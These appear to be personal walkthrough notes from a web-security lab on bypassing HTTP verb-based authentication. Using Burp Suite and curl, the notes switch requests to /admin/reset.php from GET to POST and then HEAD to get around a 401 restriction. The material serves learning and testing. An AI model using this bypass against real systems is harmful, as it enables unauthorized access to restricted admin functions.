INSECURE CONFIGURATION

#identify the restricted page by walking the application
root@oco:~$ BROWSER > {targetSite:port}/admin/reset.php
root@oco:~$ BROWSER > {targetSite:port}/admin/
 * /admin and /admin/reset.php are restricted; 401 unauthorized
 
#identify the HTTP request method used by the web application
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 username field: invalid
 password field: invalid
 * submit expected input
 
BURP > Proxy
 Request
  ...
  GET /admin/reset.php HTTP/1.1
  Host: 83.136.248.51:30992
  Authorization: Basic aW52YWxpZDppbnZhbGlk
  
  * identified GET request
  
#test whether the webapp access other requests such as POST, etc
BURP > Proxy > Change Request Method > Forward
 Request
  ...
  POST /admin/reset.php HTTP/1.1
  Host: 83.136.248.51:30992
  Authorization: Basic aW52YWxpZDppbnZhbGlk
  Content-Type: application/x-www-form-urlencoded

 * after examination, still received 401 Unauthorized
    - this indicates that the web server configurations covers both GET and POST requests
    
#test other requests
root@oco:~$ curl -i -X OPTIONS http://83.136.248.51:30992/
 * if the output does not show specific options allowed by the web server, proceed with the test
    - Allow: POST,OPTIONS,HEAD,GET

#test whether the webapp access other requests such as HEAD, etc
BURP > Proxy > Change Request Method > Forward
 Request
  ...
  HEAD /admin/reset.php HTTP/1.1                    //changed POST to HEAD
  Host: 83.136.248.51:30992
  Authorization: Basic aW52YWxpZDppbnZhbGlk
  Content-Type: application/x-www-form-urlencoded

 *  the HEAD method is identical to a GET request but does not return the body 
    in the HTTP response. If this is successful, no output may be received; however, 
    functions should still get executed, which is the main target.
     -  HEAD is the default configuration for many web servers